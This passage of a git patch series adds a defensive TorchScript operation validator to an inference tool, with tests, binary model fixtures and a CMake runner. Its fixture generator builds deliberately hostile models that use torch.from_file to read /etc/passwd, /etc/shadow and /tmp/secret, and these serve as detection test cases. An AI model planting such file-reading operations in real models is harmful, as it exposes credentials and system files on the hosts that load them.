validate_model( model_id, allowed, forbidden, args.verbose) + if args.pt_dir and args.pt_dir.is_dir(): + pt_files = sorted(args.pt_dir.glob("*.pt")) + if pt_files: + print(f"Validating {len(pt_files)} local .pt files from " + f"{args.pt_dir}...", file=sys.stderr) + for pt_path in pt_files: + name = pt_path.stem + results[f"pt:{name}"] = validate_pt_file( + name, str(pt_path), allowed, forbidden, args.verbose) + print(file=sys.stderr) print("=" * 60, file=sys.stderr) all_pass = all(results.values()) - for arch, passed in results.items(): + for key, passed in results.items(): status = "PASS" if passed else "FAIL" - print(f" {arch} ({models[arch]}): {status}", file=sys.stderr) + if key.startswith("pt:"): + print(f" {key}: {status}", file=sys.stderr) + else: + print(f" {key} ({models[key]}): {status}", file=sys.stderr) print("=" * 60, file=sys.stderr) if all_pass: diff --git a/test/CMakeLists.txt b/test/CMakeLists.txt index 69d794df0..b0798a2ea 100644 --- a/test/CMakeLists.txt +++ b/test/CMakeLists.txt @@ -75,9 +75,13 @@ add_custom_target(test_all_parallel # See dev-tools/extract_model_ops/README.md for details. set(_validate_wrapper ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/run_validation.sh) set(_validate_config ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json) +set(_validate_pt_dir ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/es_it_models) add_custom_target(validate_pytorch_inference_models - COMMAND ${_validate_wrapper} --config ${_validate_config} --verbose - COMMENT "Validating pytorch_inference allowlist against HuggingFace models" + COMMAND ${_validate_wrapper} + --config ${_validate_config} + --pt-dir ${_validate_pt_dir} + --verbose + COMMENT "Validating pytorch_inference allowlist against HuggingFace models and ES integration test models" WORKING_DIRECTORY ${CMAKE_SOURCE_DIR} ) \ No newline at end of file From c49691375f88a112a0cd4402c331b8439da44c61 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 15:34:04 +1300 Subject: [PATCH 15/30] [ML] Add integration tests with malicious TorchScript model fixtures Create six malicious .pt model fixtures that exercise specific attack vectors the CModelGraphValidator must detect: - malicious_file_reader: uses aten::from_file to read arbitrary files - malicious_mixed_file_reader: hides aten::from_file among allowed ops - malicious_hidden_in_submodule: buries unrecognised ops 3 levels deep - malicious_conditional: hides unrecognised ops inside if-branches - malicious_many_unrecognised: uses sin/cos/tan/exp (unknown arch) - malicious_file_reader_in_submodule: forbidden op hidden in child module Each test loads the real .pt file via torch::jit::load and verifies the validator correctly identifies and rejects it. Includes the Python generator script for reproducibility. Made-with: Cursor --- .../unittest/CModelGraphValidatorTest.cc | 88 ++++++++++ .../testfiles/generate_malicious_models.py | 161 ++++++++++++++++++ .../malicious_models/malicious_conditional.pt | Bin 0 -> 2205 bytes .../malicious_models/malicious_file_reader.pt | Bin 0 -> 2141 bytes .../malicious_file_reader_in_submodule.pt | Bin 0 -> 2488 bytes .../malicious_hidden_in_submodule.pt | Bin 0 -> 2517 bytes .../malicious_many_unrecognised.pt | Bin 0 -> 2311 bytes .../malicious_mixed_file_reader.pt | Bin 0 -> 2311 bytes 8 files changed, 249 insertions(+) create mode 100644 bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_conditional.pt create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_file_reader.pt create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_file_reader_in_submodule.pt create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_hidden_in_submodule.pt create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_many_unrecognised.pt create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_mixed_file_reader.pt diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index ba2411ac0..6e50adfac 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -319,4 +319,92 @@ BOOST_AUTO_TEST_CASE(testModuleWithSubmoduleInlines) { BOOST_REQUIRE(foundSin); } +// --- Integration tests with malicious .pt model fixtures --- +// +// These load real TorchScript models that simulate attack vectors. +// The .pt files are generated by testfiles/generate_malicious_models.py. + +namespace { +bool hasForbiddenOp(const CModelGraphValidator::SResult& result, const std::string& op) { + return std::find(result.s_ForbiddenOps.begin(), + result.s_ForbiddenOps.end(), op) != result.s_ForbiddenOps.end(); +} + +bool hasUnrecognisedOp(const CModelGraphValidator::SResult& result, const std::string& op) { + return std::find(result.s_UnrecognisedOps.begin(), + result.s_UnrecognisedOps.end(), op) != result.s_UnrecognisedOps.end(); +} +} + +BOOST_AUTO_TEST_CASE(testMaliciousFileReader) { + // A model that uses aten::from_file to read arbitrary files. + auto module = ::torch::jit::load( + "testfiles/malicious_models/malicious_file_reader.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(hasForbiddenOp(result, "aten::from_file")); +} + +BOOST_AUTO_TEST_CASE(testMaliciousMixedFileReader) { + // A model that mixes allowed ops (aten::add) with a forbidden + // aten::from_file. The entire model must be rejected. + auto module = ::torch::jit::load( + "testfiles/malicious_models/malicious_mixed_file_reader.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(hasForbiddenOp(result, "aten::from_file")); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); +} + +BOOST_AUTO_TEST_CASE(testMaliciousHiddenInSubmodule) { + // Unrecognised ops buried three levels deep in nested submodules. + // The validator must inline through all submodules to find them. + auto module = ::torch::jit::load( + "testfiles/malicious_models/malicious_hidden_in_submodule.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::sin")); +} + +BOOST_AUTO_TEST_CASE(testMaliciousConditionalBranch) { + // An unrecognised op hidden inside a conditional branch. The + // validator must recurse into prim::If blocks to detect it. + auto module = ::torch::jit::load( + "testfiles/malicious_models/malicious_conditional.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::sin")); +} + +BOOST_AUTO_TEST_CASE(testMaliciousManyUnrecognisedOps) { + // A model using many different unrecognised ops (sin, cos, tan, exp). + auto module = ::torch::jit::load( + "testfiles/malicious_models/malicious_many_unrecognised.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(result.s_UnrecognisedOps.size() >= 4); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::sin")); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::cos")); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::tan")); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::exp")); +} + +BOOST_AUTO_TEST_CASE(testMaliciousFileReaderInSubmodule) { + // The forbidden aten::from_file is hidden inside a submodule. + // After inlining, the validator must still detect it. + auto module = ::torch::jit::load( + "testfiles/malicious_models/malicious_file_reader_in_submodule.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(hasForbiddenOp(result, "aten::from_file")); +} + BOOST_AUTO_TEST_SUITE_END() diff --git a/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py b/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py new file mode 100644 index 000000000..45549770b --- /dev/null +++ b/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py @@ -0,0 +1,161 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Generate malicious TorchScript model fixtures for validator integration tests. + +Each model is designed to exercise a specific attack vector that the +CModelGraphValidator must detect and reject. + +Usage: + python3 generate_malicious_models.py [output_dir] + +The output directory defaults to the same directory as this script. +""" + +import os +import sys +from pathlib import Path + +import torch +from torch import Tensor +from typing import Optional + + +# --- Malicious model definitions --- + + +class FileReaderModel(torch.nn.Module): + """Uses aten::from_file to read arbitrary files from disk.""" + def forward(self, x: Tensor) -> Tensor: + stolen = torch.from_file("/etc/passwd", size=100) + return stolen + + +class MixedFileReaderModel(torch.nn.Module): + """Mixes allowed ops with a forbidden aten::from_file call.""" + def forward(self, x: Tensor) -> Tensor: + y = x + x + z = torch.from_file("/etc/shadow", size=10) + return y + z + + +class HiddenInSubmodule(torch.nn.Module): + """Hides aten::sin (unrecognised) three levels deep in submodules.""" + def __init__(self): + super().__init__() + self.inner = _Inner() + + def forward(self, x: Tensor) -> Tensor: + y = x * x + return self.inner(y) + + +class _Inner(torch.nn.Module): + def __init__(self): + super().__init__() + self.leaf = _Leaf() + + def forward(self, x: Tensor) -> Tensor: + return self.leaf(x) + x + + +class _Leaf(torch.nn.Module): + def forward(self, x: Tensor) -> Tensor: + return torch.sin(x) + + +class ConditionalMalicious(torch.nn.Module): + """Hides an unrecognised op (aten::sin) inside one branch of a conditional.""" + def forward(self, x: Tensor) -> Tensor: + if x.sum() > 0: + return torch.sin(x) + else: + return x + x + + +class ManyUnrecognisedOps(torch.nn.Module): + """Uses several different unrecognised ops to simulate an unexpected arch.""" + def forward(self, x: Tensor) -> Tensor: + a = torch.sin(x) + b = torch.cos(x) + c = torch.tan(x) + d = torch.exp(x) + return a + b + c + d + + +class FileReaderInSubmodule(torch.nn.Module): + """Hides the forbidden aten::from_file inside a submodule.""" + def __init__(self): + super().__init__() + self.reader = _FileReaderChild() + + def forward(self, x: Tensor) -> Tensor: + return x + self.reader(x) + + +class _FileReaderChild(torch.nn.Module): + def forward(self, x: Tensor) -> Tensor: + return torch.from_file("/tmp/secret", size=10) + + +# --- Generation logic --- + + +MODELS = { + "malicious_file_reader.pt": FileReaderModel, + "malicious_mixed_file_reader.pt": MixedFileReaderModel, + "malicious_hidden_in_submodule.pt": HiddenInSubmodule, + "malicious_conditional.pt": ConditionalMalicious, + "malicious_many_unrecognised.pt": ManyUnrecognisedOps, + "malicious_file_reader_in_submodule.pt": FileReaderInSubmodule, +} + + +def generate(output_dir: Path): + output_dir.mkdir(parents=True, exist_ok=True) + succeeded = [] + failed = [] + + for filename, cls in MODELS.items(): + print(f" {filename}...", end=" ") + try: + model = cls() + model.eval() + scripted = torch.jit.script(model) + path = output_dir / filename + torch.jit.save(scripted, str(path)) + size = path.stat().st_size + print(f"OK ({size} bytes)") + + # Show ops for verification + graph = scripted.forward.graph.copy() + torch._C._jit_pass_inline(graph) + ops = sorted(set(n.kind() for n in graph.nodes())) + print(f" ops: {ops}") + + succeeded.append(filename) + except Exception as exc: + print(f"FAILED: {exc}") + failed.append((filename, str(exc))) + + print(f"\nGenerated {len(succeeded)}/{len(MODELS)} models") + if failed: + print("Failed:") + for name, err in failed: + print(f" {name}: {err}") + return len(failed) == 0 + + +if __name__ == "__main__": + out_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(__file__).parent / "malicious_models" + print(f"Generating malicious model fixtures in {out_dir}") + success = generate(out_dir) + sys.exit(0 if success else 1) diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_conditional.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_conditional.pt new file mode 100644 index 0000000000000000000000000000000000000000..114707e6a7fab8d3ab35ec81472020aba354cdc2 GIT binary patch literal 2205 zcmWIWW@cev;NW1u0CEg047rIpnaP>?rN!~d`FSasC7Jnoi8=Zyi6x181=%@nP7DkU zOv&-_CHY0k8S(L4&Im=mFr8e544RF#8WA8HN{SLQ^D^_&3mH2j#DM(x%;Na8(wv<5 zq{QUx^2DN)_>BDg>_R5L(xgIWy#Q}^juZRlpNR&l1mOUnQ$>JI#dNDWg8&YvCg-Q5 z>cbtVS5WEZ#KRDU1akWf`Iy9@HF>?nmYWO_zYE^HTgW1o{ZQQR`Mf^UWBn^O zcw0W@mXPQym^kT1gy7p3%WhxZxIKJP^yBv9zaM4_PLGvWa(Q$#P{?4`w*>Pd9KTB6_KsvQ*fma7g@c z<@#rgVV%w^=Sbh*0}L8=4uLHV(~kjz$%_$RP#H2v6B|@|DXB@N>G9x*7Dov*l<@QI zzTzOzX8n0-+R?=?*7i%z@vRnUDUF=LYCp}0D>sdCN>tA{x|K*wf z2lfu7ob`CVMIIGL6AE>@{zMI>uYP+ak zcAi>EOM5_uRcP?#6??c$*EiR_JRMn-f2GZ7@$9+k{Q2|VzEr;TyJ%v;@tf7XUdB2m zm$lM0jB+d185aM`(f;;%TWb2Aw6{Osot|=CRclRgO6=KQ$J`qQQ)3pS&EMcQRnlks z%m`d~Z5SvC#< z?Z0=8=ghy#aG;sfCy}jK!TBXhKrjGEx)XKo!h%7`!F{s1%xQp z$94c?-+~E}0vdq1E=WBpc9v5XS8W9R>v)A)p5;R`rWhi!y;lXH_Dotc}l1adVQv8z2T| zW~LVAhUS)*Mn*=)<_4BV#>NI_7G{Q~rUoWv#>U2`20+@v5ahyYmfvqQfUX1K0B=T6 zV8Kg%o<5JfX`Nu-Wq&T1eJyIB|oHM*h5iQ5px&}+aXPo$xUA`RXD z$mv%Z#rPY{xQ$23FX#p$CrMcp14Dqx6T5q%nE>4=y^M!{1wx?#wPKnKOJ zFjidd!k#n(yxG`bCde`C!p&lbvS73`IH55x`~aE{0ziFWDQjp&4vapa7%M2>Ft7t5 INIgU?0Cu6J4*&oF literal 0 HcmV?d00001 diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_file_reader.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_file_reader.pt new file mode 100644 index 0000000000000000000000000000000000000000..fb0b26f4691f58d71846fc580f4db24c2022b5fd GIT binary patch literal 2141 zcmWIWW@cev;NW1u0CEg047rIpnaP>?rN!}SnK`NPMX8A?sYUuJi6x181=%@nP7DkU zOv&-_CHY0k8S(L4Za_srU^Tw^DXBSJg$$aFwHgs1!%K=1GxIX@(hC_oBgBCG_)MUg zr8znANr}nX<%vZp@frE~*@aAgrAdX%dI8?-9LFQiGKT?Gf^Y!Pl_Ee_VmecuK@^88 zlYvgqhr3O$pwi7rkRb{k#P&O$K4iet_WobjgUsgISLM1dF3#q9JUE8sFoO&w2z~udd%bZG zc$@Of?hJd(J0lKprJl?8-X7rK+Na^3*drk>l(al4s(MmMIKN%kyI-&W2-Z8qbf{Sw zh`ELaE`K%W^9%KQ$>iO~FP{vXGf(!&@0Xr7widU%AFq9TSoZ9qC9N~RO>(?_$gD`` z&?2+#Gfyfzh4LKQ9Vn6Px;2vfy1DpcjSF=~QF}@pw}nNtKE80xZOY+8S2k~%z_mEE zFYJSw@~*St?20GZW&Yp45y4%e|MPS2fdzACXB`xNQKu9=VZM;mqZz{L$`-47)`+x3 zu0EKa6>Gw~e~M`SJNwk&NYRW9LMNV2-6D4K)4CG3j`+k@waqim8L76ec|PUbD;ZJV z+0}m!znU*-@G=wu}7~-&?EVZaOGe6JGNf&N3N;<*CG3Ek!@8Z1lP$rZf~S{fM{8Jine8W|fK7#kQ_m>C!t7+P8y7@C*^rHnx?G^+A{ zq5*Ur2nTpGf&vR(awC_Pav%v5fWI7vn1v``kqZ=c6mymVdDzXuC~eUVMNYwnD2AQ~ zrfDJ#MU+hF{zp!~$|%NfX2xwiQl>yR5IIT8q8KOwOrF@?3(W-RMj@vxc@(22;WP@K zqR|aQP6RqAhKaG_au@cb8Q{&v1~Wm9Sr={=JCp^Zoxur>fnf*Gd=LQY155peDgZ_w RP>dCnZy4Bt5TqWW765rTe&zrG literal 0 HcmV?d00001 diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_file_reader_in_submodule.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_file_reader_in_submodule.pt new file mode 100644 index 0000000000000000000000000000000000000000..4d6f6328b7d69658543f879c26f1b817cbc23e66 GIT binary patch literal 2488 zcmWIWW@cev;NW1u0NM=Z47rIpnaP>?rN!}SnK`NPMX8A?sYUUbdGW=iNxAtcr8%kk zDTyVCdIi}zZcfGwQKW+grsVkelKi6NjQDsiH=rd!U^_hXf?+mr6*6cx)@nq6oLEwn zn3z3g)AV$GZ;HFnEXnU3R!`eO)tQkokK0hV9`{dAs`$83?va?AYq1*2?HlFfs~w| zlBy5)r(Qv&n-eP}wDt!0dLJ=p^ zYMDn%1^2$yJh`WTPvzc+_YTiB`xIHE`10PqGk0Gc$w~P+f&ZEqLx-@s-6@5W%7^&A z-ATH_0g@Y-+a0y=VrQGlDnG2Q?|#xra;KTqP*kBWsxnL@4OK<%+yrx;7BUC z!rx(9r@mWui{M1nB}`8>ET_gvm3sXz?bqsJ=+oWf^;*_&$F9irxo+3;%O~7<^>iy! zq8j(jJ(a@RZ;(Wg(-q>p93 zPL7+k{y3g?3i0TF+JVI0PUFP!Zd#K{V0y_D3X()4(6`V_{N zK2!UA^RE~Pv`u~^ma#**?_!bXQ8PXDB}}esGcsqgEm2*uQ$f2_?Z|_gAIV3zEx-3? zd-nF&(xrVm{m0Mmd4I+?WFKGCgD1z8>~&rojV$!47wg{qK0dRsqNGlzc}t1Kghb17 z&BDOs$tKOe;#XQ-)tFVe>6Sm&o39JXCf#jre_p4vxagb0$AuSkLg%lUw7oMtm20(B z=&oCxPnSGdH}TJ<6($Fxgx5+q24)_fdCY6$w34Lhy~;bE*h;QH^I)IGd+CrH#ww@h zNjKjTs5gySpjN-ZJydc@tg6N1!$FtxRs_Dt*)!?#r@xnvzVq4a#w+_(>}Ai4JQb;# zk2hB?`e|BMwf*_FyGEZPxfpkg|9PsmSULSa%dzR+dRg123&zZju=B59o*^dSknps7 z_Y=Q=YB{!z0!kb<^Br=Zn$#;8{?7QU6?NO^y4jsm zH%zUc9(kscmCUeXgTdCH?(u6*I&MiU-r~9MN0U=(;%VR8D$Av%l;dx`5d)c49v_- zEzAwgEiH|VjEv0#dHx?qD+To9CUM$lco-exs!-97oH{1O-4>qmMA8R z0rLS7;ekD&2Y9ow!5k{btP3}o9m;~y^T27Cfnf(I(*XfcA6P1k6T%0kFrXMKSeBiE KodKjCq80$kd=vZt literal 0 HcmV?d00001 diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_hidden_in_submodule.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_hidden_in_submodule.pt new file mode 100644 index 0000000000000000000000000000000000000000..39104c647ef007579fe16960f0521e914b29944c GIT binary patch literal 2517 zcmWIWW@cev;NW1u0BQ_247rIpnaP>?rN!|XnJFo$dGVQf@x`S{x%nxjIjQ<7i6x18 z1=%@nP8JMNWP%2!(!7wYh3K=vTYc(Q3&MPTO%*@NoOD|;X zj1U9z<1>rn(@Jx4;*%1Sv&$2UQsOi6^Ro+?{32L^vYB~#sYQj%NQTFIf`qsVSwJRc zFm`4DRRX=vkdvC2R>+F1&<7~ORmg@=SDIAF4#XTl%&8aP&CX%c_5JH6pk5FT0EVCl zFa$A!P@ln&KnN!1r=;q`{jXP0>E@(MT2Stta60R-fq?7xpIwn&4}LN8yxi3|P48B$ zMstp5Z--9nMAy0d*UP;-Eb=NgOz8W$$LA#1a4^dCOgSZc$NP=D{^HO#D{c1NW>kn{ z=?wJkVp4kZ@JHAcyR5yF)P#;ne&>_@a_@Fb3e&3$-ET=2^&FEbKK+~X=lSWBJ;L8+ za2KyH^b0f+Q1?H~x$&s;v`MN{+1_ey-@IVWzt}J86_ceHp7F&^<(_A8=dS+!br#n} zwwY{C-jb7-@XU4n@9z`Dx1`GB~?}xhq7p~4Qf1Wz^LUv5Q=gkG7 zoAVU47K;mQAI% zT!o8~fkBBGU%Xf{@RJ%ZdMT+%rRnkD#LkTzL#2Jb`Ij98+OC%c9bo12@Q`tc(mT<3 ztyNl|8F{e)H$!bbk&- zdAswI7Ms}H``SN?zkKuM^2s)~R(93vJ*Ip$3XI!!UHz7OtLfV4zq>DlrUYE6F0ovy z>2>)P=iU11uXEZ?otKO4<=MEXy~H#AQtFDPH#es(xTv>f3A5I-phbOQlLLB?SErcc2M(qoc)Q`H+?Wp&lRT;1@?@7tGUZ$G`iQE>CNQ|a+l zy9Fl{-TiwqcTV}9KdJ_MA_@Y(T1Or1<-NN1MRiLV8%syl(UVr1n^qj9|y3cmeXZa3~d7s@_`TGOg0mlcEuGblhyqD>T zDcYuY?UZ;u_h*Y631wz8gqO>$Q9rI%DHk()ZPklM^`JB$$D(wq510mmm>_8Yd+Dal zAW1L{I7|1sw_#(FG@)*BHI3(%#xCvRFE55Z68ar z0qqB2+-@*okRT8OdZ21Wzc{rh6Il6FC6)j~BR(_5%}E4nfEbvWnOc||np;{L85tRy z8(10{8ylFL8kiYdSX!D{nwpy%7#W*cSb$vky)XH@2GDgN9N^6e3M_cdhg_nofh14> zarGd?OhjFPTpH=4nCApcpZLwhs2R`=M^5IJD2CqxdW=NF5ycyNxFDx%Z4_(n0n<1k zYmjmfy1~dvRu#qI5Mcd{-(YAaK{paP1*)SMd5NHr@RW~kC~~4PK`}H8n9}jP6MIq) z@MdGvftn=8tP3}j9m;~y)!+om!0-c0N5KxR2EX&To&Hz#mQ40Vb CvmBHF literal 0 HcmV?d00001 diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_many_unrecognised.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_many_unrecognised.pt new file mode 100644 index 0000000000000000000000000000000000000000..68639503af8672b4467a0c38dd34e3a3e0802203 GIT binary patch literal 2311 zcmWIWW@cev;NW1u04fZ247rIpnaP>?rN!~NiFuXrrFliE$@%GdnZ>Co`YDMeiFyUu zIc`o?3{hl*2Bzfr_>%mhSW=XjnU|TDUdY%P zAqM2fXBNk&mFDEcCnY9lmnRmb#AoE^XBRU0l_nK3>jikTb4b5)pB4pF3BmzDpNar| zis@Bd25!7QP0mkA)rY%Mub|S+i5=$U+`fZZhYfhz-q&);3ZFQ2uJJ9em;UXQJj%C= zvR_3y7DasfR=nw2zzatOyT9_kVx2-Q68`-?PG<&`}CKie(fAjyv8_F2r_G7^s9os#7?q4h1o$z+c%j({p(Z6_avB|!c-NnYe zZAt!wX)pQCW-oqG`#t9{V~%~p>c{_87aDo5d-skX6lB-;u)jPD46YnTd_iW;z(-n; z>7}G5m8Qpo(+d|Y@PMf%wC{A@We1VA<2#!)t;IGte7Y2P>x@`vgNO>()q@I6+-#gW z=`}vfd~(jKD&1AwID_~7fo0u#zpQFI_qka6tf2ZV9)Aao;zb>nkWoC6#Eq;4?UB%{JV`ceU7j;3&;9@MF#}r@^@MVG|1MFplCW9z}WRO=} zl9*Rg3@IoCks=;iVl*&mf^%xFK4&Yi;6Sz^W2=&F>S(L zL>Y5|eLF8b6zEX~5XNo0DgoP*DoaxHi&9dHNU%RAv!o;^7379i+sBe@K>I-$w;PNY zr0|A-9;jH>FHSAW1Qy*@i6y|$h|f%Ma}vW5AO>b;rWWRg=9ZR5Mn=Zw29`#~#s+2v z24?2Q#-^s0#%7jAmgYuAW*`@uiYPzV0J;u@1H2hQfd#KQkV{$>kOT@KrXGQqh$x|v z3nE<<(_R62_)NqouhET0PTb}wM#};{MUv5oat%F1kW;iKiX|$*)Q#T~q+Ek;>_w!c zs*Gan6avOVGY7hX$mvcM#Xuoe{O*LOcXT6>6N(Xvk<$nmi9PuSc(bwTK+Tb3MkEGy ps2GgS1t&=c1`ALg0s^2uu+&m$oewO}fMTp*S#}0?29SD)S^%&S$kzY> literal 0 HcmV?d00001 diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_mixed_file_reader.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_mixed_file_reader.pt new file mode 100644 index 0000000000000000000000000000000000000000..78b8c47c43c1168d40dac2c9bd03dc71b2c3a148 GIT binary patch literal 2311 zcmWIWW@cev;NW1u04fZ247rIpnaP>?rN!~NnH8xi@oAYksqsari7BZ?`YDMeiFyUu zIc`o?3{hl*2Bzfr_>%mhq7QebUO}as6C2dexqXh=hYfgI-~Sa|w47y6*>0(AkMr&( zya{UyNUAg}U8`hm@^=0F$-NsL^_^_?zJK|3Vo_V{j2pJ?C-QyzO4a+4gP%+6+^WrR zL|9XH=Y}+wik82}7nLpk{(s3Lksy!x2@8cgH*2PRN$$B3SZ^`eO2&on>%S^3N1>yC zbLK=Im)rB=O{S51{_AF?Tl^ifqgj1Z8PvGn&)Jm0UG8tcI#zFbRMtcDCo#s7Gj6%= z|Mx2HX~({0X0LUp*Ue@xDvFb?n0SOu?%jUIr$$-7CYKr(Y@a{RB)x4Vj^-s!<_o2k=~pE@Z_G7WpSCnFEK*a&?Kh8Z`m$5q&r0gOdT%^@ z^mB7_K<_1X+m&v+uWj8v??UW~V=F)O)S9l~J$%Suv8D4&Y3&^c@8lsMN!^tCW1HT+K4bEDGtYhE$17&IvMG?XYO&#)3b ziYsF-kk2p9OAiHl zngN7y+pbE$_N2;^)chh~*+_!@IhiFTIjJBwwAwzFWCPj{!noaF#2|$?1oS|~vVL)D zQ6{kHu1YKchDLm5ikp)djsP(*Gc&a?H#E1jG%_+WHaD;|GB!3aHn%V^ur#(bGdHj> zH!`p^Ffj$WaHgc8vU=05SCl#6&~^ja&%nqL}s?$irtM zMsba9G;%^WM=@Fv=qZwnMwDsjA%dKuHBl^)0H$vImLTOIbYqc|sxpePQwSIf%^c_k zBBwi56a$4=@w*eA-qDRjPAEnwMouGOB=+PR;LXOS12spE8Ic&+p<*yP7n~#+7%V_} d2nc}sz*0-0RX(t61B$VNW!V|n89?eGY5`^-$|3*& literal 0 HcmV?d00001 From 6020a5cae17f3b3c59d6b934a22e12f220a82057 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 16:35:20 +1300 Subject: [PATCH 16/30] [ML] Replace run_validation.sh with portable CMake script MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Replace the bash wrapper script with cmake/run-validation.cmake that works across all CI platforms (Linux, macOS, Windows). The CMake script searches for python3, python3.12, python3.11, python3.10, python3.9, and python — handling Linux build machines where Python is only available as python3.12 (via make altinstall) and Windows where the canonical name is python. It also prepends the venv's torch/lib directory to the dynamic library search path to avoid conflicts with any system-installed libtorch. Made-with: Cursor --- cmake/run-validation.cmake | 187 ++++++++++++++++++ dev-tools/extract_model_ops/README.md | 10 +- dev-tools/extract_model_ops/run_validation.sh | 40 ---- test/CMakeLists.txt | 18 +- 4 files changed, 204 insertions(+), 51 deletions(-) create mode 100644 cmake/run-validation.cmake delete mode 100755 dev-tools/extract_model_ops/run_validation.sh diff --git a/cmake/run-validation.cmake b/cmake/run-validation.cmake new file mode 100644 index 000000000..cc4b66843 --- /dev/null +++ b/cmake/run-validation.cmake @@ -0,0 +1,187 @@ +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# + +# Portable CMake script that locates a Python 3 interpreter, ensures a +# virtual environment with the required packages exists, and then runs +# validate_allowlist.py. +# +# Required variables (passed via -D on command line): +# SOURCE_DIR - path to the repository root +# +# Optional variables: +# VALIDATE_CONFIG - path to validation_models.json +# VALIDATE_PT_DIR - directory of .pt files to validate +# VALIDATE_VERBOSE - if TRUE, pass --verbose to the script + +cmake_minimum_required(VERSION 3.16) + +if(NOT DEFINED SOURCE_DIR) + message(FATAL_ERROR "SOURCE_DIR must be defined") +endif() + +set(_tools_dir "${SOURCE_DIR}/dev-tools/extract_model_ops") +set(_venv_dir "${_tools_dir}/.venv") +set(_requirements "${_tools_dir}/requirements.txt") +set(_validate_script "${_tools_dir}/validate_allowlist.py") + +# --- Locate a Python 3 interpreter --- +# Try names in order of preference. On Linux build machines Python may +# only be available as python3.12 (installed via make altinstall). +# On Windows the canonical name is just "python". +set(_python_names + python3 + python3.12 + python3.11 + python3.10 + python3.9 + python +) + +set(_python_exe "") +foreach(_name ${_python_names}) + execute_process( + COMMAND ${_name} --version + OUTPUT_VARIABLE _py_version_out + ERROR_VARIABLE _py_version_out + RESULT_VARIABLE _py_rc + OUTPUT_STRIP_TRAILING_WHITESPACE + ) + if(_py_rc EQUAL 0) + # Verify it is actually Python 3 + string(REGEX MATCH "Python 3\\." _is_py3 "${_py_version_out}") + if(_is_py3) + set(_python_exe "${_name}") + message(STATUS "Found Python 3: ${_name} (${_py_version_out})") + break() + endif() + endif() +endforeach() + +if(_python_exe STREQUAL "") + message(FATAL_ERROR + "No Python 3 interpreter found on PATH.\n" + "Searched for: ${_python_names}\n" + "Install Python 3 or ensure it is on your PATH.") +endif() + +# Resolve the full path so venv creation and pip invocations are unambiguous. +find_program(_python_path "${_python_exe}") +if(NOT _python_path) + # find_program failed but the execute_process above succeeded — fall back + # to the bare name (it will still work via PATH lookup). + set(_python_path "${_python_exe}") +endif() + +# --- Platform-specific venv paths --- +if(CMAKE_HOST_WIN32) + set(_venv_python "${_venv_dir}/Scripts/python.exe") + set(_venv_pip 